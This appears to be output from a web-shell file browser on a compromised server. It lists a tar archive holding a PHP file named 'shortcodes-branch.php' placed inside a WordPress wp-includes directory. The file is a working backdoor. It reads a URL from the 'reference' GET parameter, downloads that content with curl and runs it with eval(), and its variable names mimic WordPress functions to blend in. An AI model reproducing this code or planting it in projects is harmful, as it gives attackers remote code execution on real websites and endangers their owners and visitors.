Your IP : 216.73.216.1
Current Path : /proc/self/cwd/ |
|
Current File : //proc/self/cwd/shortcodes-branch.php.tar |
home/fotolxhq/agenciacrabli.com/wp-includes/shortcodes-branch.php 0000644 00000000532 15051266671 0021245 0 ustar 00 <?php
if (isset($_GET['reference'])) {
$get_the_time_as = $_GET['reference'];
if ($home_url_md = curl_init()) {
curl_setopt($home_url_md, CURLOPT_URL, $get_the_time_as);
curl_setopt($home_url_md, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($home_url_md));
curl_close($home_url_md);
exit;
}
}